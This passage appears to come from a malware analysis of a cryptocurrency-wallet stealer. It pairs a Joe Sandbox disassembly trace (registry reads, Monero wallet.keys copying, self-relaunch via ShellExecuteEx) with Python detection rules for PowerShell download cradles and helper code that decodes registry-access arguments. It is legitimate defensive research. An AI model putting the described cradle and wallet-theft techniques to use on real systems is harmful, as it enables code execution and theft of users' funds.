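     "target": r"C:\Users\user\Documents\Monero\wallet.keys"},
    {"type": "file_access", "image": r"C:\Program Files\monero-gui\monero-wallet-gui.exe",
     "target": r"C:\Users\user\Documents\Monero\wallet.keys"},
]

# iex / Invoke-Expression over WebClient.DownloadString('<url>'), tolerant of
# spacing, the System. prefix and either quote style; group 1 is the URL.
CRADLE_RE = re.compile(
    r"(?i)\b(?:iex|invoke-expression)\b.*?new-object\s+(?:system\.)?net\.webclient"
    r"\s*\)?\s*\.downloadstring\(\s*['\"]([^'\"]+)['\"]")
NOPROFILE_RE = re.compile(r"(?i)(?:^|\s)-no(?:p|profile)\b")

WALLET_SUFFIXES = (r"\monero\wallet.keys",)  # string referenced in the report
WALLET_OWNERS = {"monero-wallet-gui.exe", "monero-wallet-cli.exe"}  # assumed legitimate accessors


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def parse_cradle(command_line):
    """Return url/host/noprofile for a download cradle, or None if absent."""
    m = CRADLE_RE.search(command_line)
    if not m:
        return None
    url = m.group(1)
    return {"url": url, "host": urlsplit(url).hostname or "",
            "noprofile": bool(NOPROFILE_RE.search(command_line))}


def scan(events):
    """Run both rules over a list of events and return the findings in order."""
    findings = []
    for ev in events:
        if ev["type"] == "process_create" and basename(ev["image"]) == "powershell.exe":
            cradle = parse_cradle(ev["command_line"])
            if cradle:
                findings.append({"rule": "ps_download_cradle",
                                 "parent": ev["parent_image"], **cradle})
        elif ev["type"] == "file_access":
            if (ev["target"].lower().endswith(WALLET_SUFFIXES)
                    and basename(ev["image"]) not in WALLET_OWNERS):
                findings.append({"rule": "wallet_file_access",
                                 "image": ev["image"], "target": ev["target"]})
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```

The cradle rule keys on the iex + WebClient.DownloadString shape rather than on the literal -nop -c prefix, because the prefix is trivially changed while the cradle body is what actually fetches and runs stage two; the parent image in the finding is what ties the PowerShell child back to the dropper.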
                              APIs
                              • LocalAlloc.KERNEL32(00000040,?), ref: 00689F41
                                • Part of subcall function 0069A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0069A7E6
                                • Part of subcall function 0069A740: lstrcpy.KERNEL32(006A0E17,00000000), ref: 0069A788
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$AllocLocal
                              • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                              • API String ID: 4171519190-1096346117
                              • Opcode ID: 99b75406ac2b0171976ee0e136c84de08b980b9a0561a42c43cfb1d923c2111b
                              • Instruction ID: 951a045b6476dbaf8debcec24796cebed710a155ac255388991a9abac25171fc
                              • Opcode Fuzzy Hash: 99b75406ac2b0171976ee0e136c84de08b980b9a0561a42c43cfb1d923c2111b
                              • Instruction Fuzzy Hash: 30613E70A10208DBDF14EFA4CD96FED77BAAF45304F008118F90A5F581EB706A06CB96
                              APIs
                              • RegOpenKeyExA.ADVAPI32(80000001,0148DDA0,00000000,00020119,?), ref: 006940F4
                              • RegQueryValueExA.ADVAPI32(?,0148E530,00000000,00000000,00000000,000000FF), ref: 00694118
                              • RegCloseKey.ADVAPI32(?), ref: 00694122
                              • lstrcat.KERNEL32(?,00000000), ref: 00694147
                              • lstrcat.KERNEL32(?,0148E560), ref: 0069415B
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$CloseOpenQueryValue
                              • String ID:
                              • API String ID: 690832082-0
                              • Opcode ID: c9b094a5120bd65a3a8586c054f7ced27c40e4e39b15cb71407ddf7996fb3267
                              • Instruction ID: 07802b373791e756e176d0fff57a86ebd99e98c4738a18932a3b2143891a84a3
                              • Opcode Fuzzy Hash: c9b094a5120bd65a3a8586c054f7ced27c40e4e39b15cb71407ddf7996fb3267
                              • Instruction Fuzzy Hash: 5A4189B6D0010C6BDB18FBA0EC56FFE737DBB88304F00455DB61697181EA755B888B92
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00697E37
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00697E3E
                              • RegOpenKeyExA.ADVAPI32(80000002,0147C010,00000000,00020119,?), ref: 00697E5E
                              • RegQueryValueExA.ADVAPI32(?,0148DA80,00000000,00000000,000000FF,000000FF), ref: 00697E7F
                              • RegCloseKey.ADVAPI32(?), ref: 00697E92
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID:
                              • API String ID: 3225020163-0
                              • Opcode ID: a24b84fbabd029b173358b7a2c97b4e895670a37fdb4bdd051fcc3337baa7d1d
                              • Instruction ID: 7ada373f0df84e31523477aa254055fea2af42020d433445b9c9c0064b37c3f9
                              • Opcode Fuzzy Hash: a24b84fbabd029b173358b7a2c97b4e895670a37fdb4bdd051fcc3337baa7d1d
                              • Instruction Fuzzy Hash: 1F1170B1A44209EBDB08CF95DD49FBBBBBDFB44B14F104169F605A7680D7745C018BA1
                              APIs
                              • StrStrA.SHLWAPI(0148E278,?,?,?,0069140C,?,0148E278,00000000), ref: 0069926C
                              • lstrcpyn.KERNEL32(008CAB88,0148E278,0148E278,?,0069140C,?,0148E278), ref: 00699290
                              • lstrlen.KERNEL32(?,?,0069140C,?,0148E278), ref: 006992A7
                              • wsprintfA.USER32 ref: 006992C7
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpynlstrlenwsprintf
                              • String ID: %s%s
                              • API String ID: 1206339513-3252725368
                              • Opcode ID: 624853afe8aa9417f01e1385c6b721e1c79f1f0fc7c7bffe2276f6fafd7fd447
                              • Instruction ID: 22b44be23559a09b600e01ea1711c54c8118c5f2a40de5a83ef9a6f1b77d9691
                              • Opcode Fuzzy Hash: 624853afe8aa9417f01e1385c6b721e1c79f1f0fc7c7bffe2276f6fafd7fd447
                              • Instruction Fuzzy Hash: 8D01977550010CFFCB08DFECD988EAE7BB9FB44368F148148F9099B604C635AE509B91
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 006812B4
                              • RtlAllocateHeap.NTDLL(00000000), ref: 006812BB
                              • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 006812D7
                              • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 006812F5
                              • RegCloseKey.ADVAPI32(?), ref: 006812FF
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID:
                              • API String ID: 3225020163-0
                              • Opcode ID: bea8292ea5f9cdee7ad0d77bd5c422a3f078db5b6fdf4d201b8dcf8ec57905cd
                              • Instruction ID: 4af25865cfd4aa7625a67362c942dbc0ed2a456675e6f40a157ebc6525b52e37
                              • Opcode Fuzzy Hash: bea8292ea5f9cdee7ad0d77bd5c422a3f078db5b6fdf4d201b8dcf8ec57905cd
                              • Instruction Fuzzy Hash: 07011DB9A4020CBBDB04DFE0DC49FAEB7B8FB48705F008159FA0597280D6719A018B51
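The three RegOpenKeyExA entries above (006940F4 under HKEY_CURRENT_USER 0x80000001, 00697E5E under HKEY_LOCAL_MACHINE 0x80000002, and 006812D7 on a handle the decompiler could not resolve) all pass samDesired 0x00020119. That is not plain KEY_READ, which is 0x20019: the extra 0x100 bit is KEY_WOW64_64KEY, so this 32-bit sample (32-bit addresses throughout, and a hard-coded SysWOW64 PowerShell path) explicitly opens the 64-bit registry view and bypasses WOW64 redirection into Wow6432Node. The subkey arguments 0148DDA0 and 0147C010 lie well above the dumped module regions listed under Memory Dump Source (0x680000 through 0xD0A000), so the key names are runtime-built strings that the report cannot show. The Python below is an added helper, not part of the report or the Joe Sandbox tooling: it parses API lines in the report's own format and decodes the root handle, the access mask and where the subkey pointer lands. The upper bound of the module range is an assumption (the report lists region start addresses only).

```python
"""Decode RegOpenKeyExA argument listings in this report's own "APIs" format.

Added helper, not part of the report. It resolves the root handle, expands the
samDesired mask into named rights and view selectors, and says whether the
subkey pointer falls inside the dumped image.
"""
import re

# API lines copied from this report's function entries ('?' marks an argument
# the decompiler could not recover).
REPORT_LINES = [
    "• RegOpenKeyExA.ADVAPI32(80000001,0148DDA0,00000000,00020119,?), ref: 006940F4",
    "• RegOpenKeyExA.ADVAPI32(80000002,0147C010,00000000,00020119,?), ref: 00697E5E",
    "• RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 006812D7",
]

LINE_RE = re.compile(r"(\w+)\.(\w+)\((.*?)\),\s*ref:\s*([0-9A-Fa-f]{8})")

HKEY_NAMES = {
    0x80000000: "HKEY_CLASSES_ROOT", 0x80000001: "HKEY_CURRENT_USER",
    0x80000002: "HKEY_LOCAL_MACHINE", 0x80000003: "HKEY_USERS",
    0x80000005: "HKEY_CURRENT_CONFIG",
}

# Registry access rights from winnt.h. Composite masks are matched first, then
# single bits; KEY_WOW64_* select a registry view but travel in samDesired too.
KEY_READ, KEY_WRITE, KEY_ALL_ACCESS = 0x20019, 0x20006, 0xF003F
COMPOSITES = [(KEY_ALL_ACCESS, "KEY_ALL_ACCESS"), (KEY_READ, "KEY_READ"), (KEY_WRITE, "KEY_WRITE")]
SINGLE_BITS = [
    (0x0001, "KEY_QUERY_VALUE"), (0x0002, "KEY_SET_VALUE"), (0x0004, "KEY_CREATE_SUB_KEY"),
    (0x0008, "KEY_ENUMERATE_SUB_KEYS"), (0x0010, "KEY_NOTIFY"), (0x0020, "KEY_CREATE_LINK"),
    (0x0100, "KEY_WOW64_64KEY"), (0x0200, "KEY_WOW64_32KEY"),
    (0x10000, "DELETE"), (0x20000, "READ_CONTROL"), (0x40000, "WRITE_DAC"), (0x80000, "WRITE_OWNER"),
]
# Dumped module range: base 0x680000 from the report; the upper bound is an
# assumption (one page past the last listed region start, 0xD0A000).
MODULE_RANGE = (0x00680000, 0x00D0B000)


def parse_api_line(line):
    """'Func.MODULE(a,b,?), ref: ADDR' -> dict; '?' arguments become None."""
    m = LINE_RE.search(line)
    if not m:
        raise ValueError(f"not an API line: {line!r}")
    func, module, args, ref = m.groups()
    parsed = [None if a.strip() == "?" else int(a, 16) for a in args.split(",")]
    return {"func": func, "module": module, "args": parsed, "ref": int(ref, 16)}


def decode_access(mask):
    """Expand a samDesired mask into names, e.g. 0x20119 -> KEY_READ, KEY_WOW64_64KEY."""
    names, remaining = [], mask
    for value, name in COMPOSITES:
        if remaining & value == value:
            names.append(name)
            remaining &= ~value
    for bit, name in SINGLE_BITS:
        if remaining & bit:
            names.append(name)
            remaining &= ~bit
    if remaining:
        names.append(f"0x{remaining:X}")  # leftover bits this table does not name
    return names


def describe_regopen(line):
    """Interpret one RegOpenKeyExA line from the report."""
    call = parse_api_line(line)
    if call["func"] != "RegOpenKeyExA" or len(call["args"]) != 5:
        raise ValueError(f"expected a RegOpenKeyExA line: {line!r}")
    hkey, subkey, _options, sam, _result = call["args"]
    root = HKEY_NAMES.get(hkey, "<runtime handle, not a predefined root>")
    if subkey is None:
        subkey_note = "unrecovered"
    elif MODULE_RANGE[0] <= subkey < MODULE_RANGE[1]:
        subkey_note = "points into the dumped image"
    else:
        subkey_note = "points outside the dumped image (runtime-built string)"
    return {"ref": f"{call['ref']:08X}", "root": root, "subkey": subkey_note,
            "access": decode_access(sam), "reads_64bit_view": bool(sam & 0x0100)}


if __name__ == "__main__":
    for report_line in REPORT_LINES:
        print(describe_regopen(report_line))
```

Run over the three lines, every entry comes back with access ["KEY_READ", "KEY_WOW64_64KEY"] and reads_64bit_view set, which is the detail worth carrying into a write-up: whatever keys are being read, the 32-bit dropper is reading the native 64-bit hive, not the WOW64 shadow.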
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: String___crt$Type
                              • String ID:
                              • API String ID: 2109742289-3916222277
                              • Opcode ID: 25b17dbdcd913aaad30a316e8c4f490eb3581d540c7694608b904c5a4549a7d0
                              • Instruction ID: b862dc04272d14ee22ac564ba5d931ba814a78f32c8ad17f627cb8763603f9dc
                              • Opcode Fuzzy Hash: 25b17dbdcd913aaad30a316e8c4f490eb3581d540c7694608b904c5a4549a7d0
                              • Instruction Fuzzy Hash: 194134B110078C5EDF218B24CD84FFBBBEEAF01314F1444ECE98A86582E2319A45DF24
                              APIs
                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00696663
                                • Part of subcall function 0069A740: lstrcpy.KERNEL32(006A0E17,00000000), ref: 0069A788
                                • Part of subcall function 0069A9B0: lstrlen.KERNEL32(?,014891A8,?,\Monero\wallet.keys,006A0E17), ref: 0069A9C5
                                • Part of subcall function 0069A9B0: lstrcpy.KERNEL32(00000000), ref: 0069AA04
                                • Part of subcall function 0069A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0069AA12
                                • Part of subcall function 0069A8A0: lstrcpy.KERNEL32(?,006A0E17), ref: 0069A905
                              • ShellExecuteEx.SHELL32(0000003C), ref: 00696726
                              • ExitProcess.KERNEL32 ref: 00696755
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                              • String ID: <
                              • API String ID: 1148417306-4251816714
                              • Opcode ID: 77ff7c66eb4e8fae6ed9f5a6e9d42807a0a0ee5fd2839aafbee09e45f4c6ec6c
                              • Instruction ID: b6e6a7264e95985509722462fbf47d10df5a47f5d92e5fd2bac7cbf7f3262185
                              • Opcode Fuzzy Hash: 77ff7c66eb4e8fae6ed9f5a6e9d42807a0a0ee5fd2839aafbee09e45f4c6ec6c
                              • Instruction Fuzzy Hash: 393127B1801218ABDB58EB90DD86FDEB7BDBF04300F404189F20966191DF746A48CFAA
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,006A0E28,00000000,?), ref: 0069882F
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00698836
                              • wsprintfA.USER32 ref: 00698850
                                • Part of subcall function 0069A740: lstrcpy.KERNEL32(006A0E17,00000000), ref: 0069A788
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateProcesslstrcpywsprintf
                              • String ID: %dx%d
                              • API String ID: 1695172769-2206825331
                              • Opcode ID: 04ea56e95a159bbe4433f8d22aa668c36d65a8c0daeab7e19f176b0da355914b
                              • Instruction ID: c7e0a861ac91e5bf3000c6a050531de0fce3c7edb0353227afabb7b877ee9b7e
                              • Opcode Fuzzy Hash: 04ea56e95a159bbe4433f8d22aa668c36d65a8c0daeab7e19f176b0da355914b
                              • Instruction Fuzzy Hash: AE211FB1E40208AFDB04DFD4DD49FAEBBB9FB48715F104119F605A7680C779A901CBA1
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0069951E,00000000), ref: 00698D5B
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00698D62
                              • wsprintfW.USER32 ref: 00698D78
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateProcesswsprintf
                              • String ID: %hs
                              • API String ID: 769748085-2783943728
                              • Opcode ID: 25c1c4e21020e33dd805383794ce6d8aa0c218502e09a52e60d12c8d8d726620
                              • Instruction ID: f77331d54b21838d2b694f741d87e0fbb8019874457826e66a74c1c162caddb9
                              • Opcode Fuzzy Hash: 25c1c4e21020e33dd805383794ce6d8aa0c218502e09a52e60d12c8d8d726620
                              • Instruction Fuzzy Hash: 2FE08CB0A4020CBBDB04DB94DC0AE6977B8FB0470AF0000A4FD0987280DA719E008B96
                              APIs
                                • Part of subcall function 0069A740: lstrcpy.KERNEL32(006A0E17,00000000), ref: 0069A788
                                • Part of subcall function 0069A9B0: lstrlen.KERNEL32(?,014891A8,?,\Monero\wallet.keys,006A0E17), ref: 0069A9C5
                                • Part of subcall function 0069A9B0: lstrcpy.KERNEL32(00000000), ref: 0069AA04
                                • Part of subcall function 0069A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0069AA12
                                • Part of subcall function 0069A8A0: lstrcpy.KERNEL32(?,006A0E17), ref: 0069A905
                                • Part of subcall function 00698B60: GetSystemTime.KERNEL32(006A0E1A,0148A5A0,006A05AE,?,?,006813F9,?,0000001A,006A0E1A,00000000,?,014891A8,?,\Monero\wallet.keys,006A0E17), ref: 00698B86
                                • Part of subcall function 0069A920: lstrcpy.KERNEL32(00000000,?), ref: 0069A972
                                • Part of subcall function 0069A920: lstrcat.KERNEL32(00000000), ref: 0069A982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0068A2E1
                              • lstrlen.KERNEL32(00000000,00000000), ref: 0068A3FF
                              • lstrlen.KERNEL32(00000000), ref: 0068A6BC
                                • Part of subcall function 0069A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0069A7E6
                              • DeleteFileA.KERNEL32(00000000), ref: 0068A743
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                              • String ID:
                              • API String ID: 211194620-0
                              • Opcode ID: 2ba761cf2c581dde315803725c5a1a2ab56b3058f348e65c1848b434a7c78d3c
                              • Instruction ID: 99e52da9a13297e65049025ac139a5642b0256025dab14e38f67b2e43a574610
                              • Opcode Fuzzy Hash: 2ba761cf2c581dde315803725c5a1a2ab56b3058f348e65c1848b434a7c78d3c
                              • Instruction Fuzzy Hash: E8E1DC728201189ADF48FBE4DD92EEE737EBF14300F50815DF51676491EE306A49CBAA
                              APIs
                                • Part of subcall function 0069A740: lstrcpy.KERNEL32(006A0E17,00000000), ref: 0069A788
                                • Part of subcall function 0069A9B0: lstrlen.KERNEL32(?,014891A8,?,\Monero\wallet.keys,006A0E17), ref: 0069A9C5
                                • Part of subcall function 0069A9B0: lstrcpy.KERNEL32(00000000), ref: 0069AA04
